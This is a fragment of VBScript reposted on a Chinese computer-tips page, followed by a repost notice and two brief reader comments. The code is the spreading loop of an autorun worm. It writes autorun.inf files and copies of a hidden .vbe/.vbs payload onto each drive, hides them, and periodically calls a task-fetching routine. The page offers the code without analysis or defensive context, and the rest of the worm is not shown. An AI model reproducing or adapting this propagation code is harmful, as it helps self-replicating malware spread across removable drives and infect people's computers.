if fso.folderexists(d&"/autorun.inf") then
delfile d&"/autorun.inf"
end if
if fso.fileexists(d&"/"&filename&".vbs") and fso.fileexists(d&"/autorun.inf") then
if readtxt(d&"/autorun.inf",1)<>tile then
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
else
yincang
copyfile dir&"/"&infname,d&"/autorun.inf"
copyfile win&"/"&filename&".vbe",d&"/"&filename&".vbs"
end if
end if
next
if (minute(now) mod 2)=0 and rw<>-1 then
gettask
end if
wscript.sleep 3000
loop
end function
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-25803-21.html
我说的那些别人不一定知道
支持你